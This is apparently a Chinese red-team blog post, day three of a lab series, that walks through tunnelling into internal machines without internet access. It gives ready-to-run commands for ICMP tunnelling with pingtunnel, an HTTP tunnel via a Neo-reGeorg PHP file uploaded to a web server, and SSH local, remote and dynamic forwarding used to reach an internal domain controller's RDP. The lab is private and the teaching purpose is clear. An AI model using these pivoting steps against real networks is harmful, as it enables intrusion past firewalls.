红队笔记Day3-->隧道上线不出网机器

昨天讲了通过代理的形式(端口转发)实现了上线不出网的机器,那么今天就来讲一下如何通过隧道上线不出网机器

目录

1.网络拓扑

2.开始做隧道?No!!!

3.icmp隧道

4.HTTP隧道

5.SSH隧道

1.什么是ssh隧道

2.ssh隧道:端口转发

3.SSH远程端口转发

4.ssh动态端口转发


1.网络拓扑

今天我youyouyouyouyoyoyo又配环境配到崩溃了,是的,配环境已经给我整麻了(kali的网卡那里感觉有点问题,怎么配都配不好)所以我知难而退,改换桥接!!

大概是这样的一个网络拓扑

2.开始做隧道?No!!!

第一部肯定不是做隧道啊!,你连防火墙给你通过什么流量都不知道,做啥隧道,做了流量也过不去 ,所以!!正确的第一步,是通过对应的流量探测去制定隧道的种类!!!

3.icmp隧道

所谓的icmp隧道就是:将数据包夹带在icmp的数据包中,其中,ICMP 隧道几乎在所有的网络环境中都是被允许的,因此攻击者可以通过 ICMP 隧道绕过一些网络安全设备。

但是!!!这个程序似乎在一些低版本的Windows上运行不了(缺少一些系统动态链接库文件)

虽然win11可以(但是很多内网的环境都是用的win7 winserver这种的)所以适用范围较窄感觉

即便是这样,那也还是要将草走复现一下的!😭😭😭

先是kali上的命令

bash 复制代码
sysctl -w net.ipv4.icmp_echo_ignore_all=1  //用于禁用本机对icmp流量的应答

然后再win7靶机上运行

bash 复制代码
pingtunnel.exe -type server -noprint 1 -nolog 1

然后kali上运行以下命令,意思就是将本机的8888作为scok5的连接端接口

bash 复制代码
bash pingtunnel -type client -l:8888 192.168.3.58 -sock5 1

最后就在kali上修改一个配置文件

bash 复制代码
vim /etc/proxychain4.conf //并且在底部添加一行socks5 127.0.0.1 8888 即可

就可以远程连接了

bash 复制代码
proxychains rdesktop 192.168.52.138

4.HTTP隧道

这个比较常见,我们经常都是通过一个web漏洞去getshell的,所以防火墙一般不会限制http流量

HTTP隧道有特别特别多,今天来分享一个加密隧道穿透 Neoreg-reGeorg

下载连接 :项目概览 - Neo-reGeorg - GitCode

开整,先再摆一下网络拓扑,以免忘记

先在kali上运行,k后面可以跟上你自己的密码

bash 复制代码
python neoreg.py -k "你的密码"

然后判断网站的语言,我这个win7上搭建的是php的网站

我们在执行完kali的命令之后会生成一个文件夹

--->

选择对应的网站语言扔上去 (我这里扔的是tunnel.php)可以看见能成功访问

于是就在kali上执行这个命令,意思就是开本地的8888端口来连接远程的php文件

bash 复制代码
python neoreg.py -k "你的密码" -u http://192.168.3.58/tunnel.php  -p 8888

这就可以了???,肯定不是啊,你还没开socks5的本地代理端口,咳咳咳,差点忘记说了

这个工具建立的是socks5代理,所以你就开启对应的代理端口

bash 复制代码
vim /ect/proxychains4.conf

在这个文件的最底端加上这个指令 socks5 127.0.0.1 8888

然后就可以连接啦!!!!

bash 复制代码
proxychains rdesktop 192.168.52.138 //这个可以直接写内网的地址!!!

这样就能成功连接上去了!!!!嘿嘿嘿

当然了,http隧道可不止这一种,tunna abptts pivotnaacci 这些都是http的隧道,就不多枚举了

5.SSH隧道

众所周知,在实战中一般服务器都是的Linux_like的,于是小编就去下载了一个Ubuntu来玩一下

是时候该更新网络拓扑啦

于是这样我们就有了一台新的Linux服务器,可以搞事情了

直接访问它的网站根目录下的文件hhhh~~~

1.什么是ssh隧道

在实际中,大部分的Linux服务器都支持ssh协议 ,内网中的主机和设备以及边界的防火墙都允许ssh流量 通过,但是!!!ssh除了可以远程连接,还可以转发流量,并且是加密转发,进而突破防火墙限制

2.ssh隧道:端口转发

首先确定Ubuntu的22端口开放,以及知道它的账号密码 ,就可以在kali进行以下操作

bash 复制代码
ssh -L 8887 192.168.52.138:3389 whoami@192.168.3.61 -p 22

这个的意思就是

  • kali先通过连接Ubuntu服务器
  • 又因为Ubuntu可以和内网通信, -L 意思为将靶机的3389端口的流量准发到攻击机的8887端口
  • 当kali访问本地的8887就等于在访问内网DC的3389端口

这样就可以同时连接上两台服务器!!!

3.SSH远程端口转发

这个和本地端口转发有点类似不过要先获取它的root权限,这个Linux不用于Linux

蚁剑是无法执行ssh的,而且上线cs有点困难我不会,于是就要在ubuntu上面敲这个代码

bash 复制代码
ssh -R 8887:192.168.52.138:3389 kali@192.168.3.57 -p 22

前提是你的攻击机器kali开启22端口!!可以这样查看

bash 复制代码
sudo systemctl status ssh 

没开启的话开启就好

bash 复制代码
sudo systemctl start ssh

然后在你的Ubuntu上面输入kali的密码就能成功连接了

但是,在你连接上了内网DC的时候,Ubuntu也是连接上了你的kali

如果你的虚拟机配置不当,或者说别的大佬有0day,是可以造成虚拟机越狱的,那到时候你就惨了

4.ssh动态端口转发

所谓的动态端口转发就是建立起一个ssh加密的socks4/5的代理隧道,我们需要在kali运行以下命令

bash 复制代码
ssh -D 8888 whoami@192.168.3.61 

然后就能连接上Ubuntu了,其中的 -D意为建立socks5隧道流量走8888端口,去连接ubutu的22端口

当然了,以上能成功,是在socks5代理成功配置的情况下噢

满足上述条件,就能实现内网穿透了,远程上线成功!!!!

以上,就是多种的协议对应的一些隧道!!当然还有很多,像DNS ,RDP ,IPV6都是有对应隧道的,这里我就不枚举了!!

明天讲什么呢?? 讲隧道穿透利用方法, 多层代理,反正向代理,多级代理,节点加密,节点穿透,对应工具部署!!!! Byd我都期待起来了!!

相关推荐
xiangshangdemayi1 个月前
vue3环境下mapbox本地部署极速入门
部署·矢量切片·mapbox·内网·离线·天地图
ccc_9wy1 个月前
pikachu靶场SSRF-file_get_content测试报告
网络安全·内网·ssrf·web漏洞·中间人攻击·filegetcontents·file协议
Splashtop高性能远程控制软件2 个月前
远程桌面内网穿透是什么?有什么作用?
内网穿透·远程控制·远程桌面·内网
俱会一处3 个月前
用openssl 创建自签名证书用于内网HTTPS
https·openssl·内网·局域网
hgdlip3 个月前
ip地址是公网还是内网?内网电脑ip地址在哪看
服务器·网络·电脑·负载均衡·ip地址·内网
SuperherRo4 个月前
内网对抗-基石框架篇&域树林&域森林架构&信任关系&多域成员层级&信息收集&环境搭建
内网·域树·域森林
SuperherRo4 个月前
内网对抗-代理通讯篇&不出网或不可达&SockS全协议&规则配置&C2正反向上线&解决方案
代理·socks·内网·c2上线·正反向
SuperherRo4 个月前
内网对抗-基石框架篇&单域架构&域内应用控制&成员组成&用户策略&信息收集&环境搭建
架构·内网·单域
想拿 0day 的脚步小子5 个月前
应用程序提权
安全·渗透测试·提权·内网
EasyCVR5 个月前
如何在纯内网环境下,将EasyCVR视频汇聚网关通过4G与第三方公网云平台级联?
音视频·视频编解码·视频汇聚·4g·内网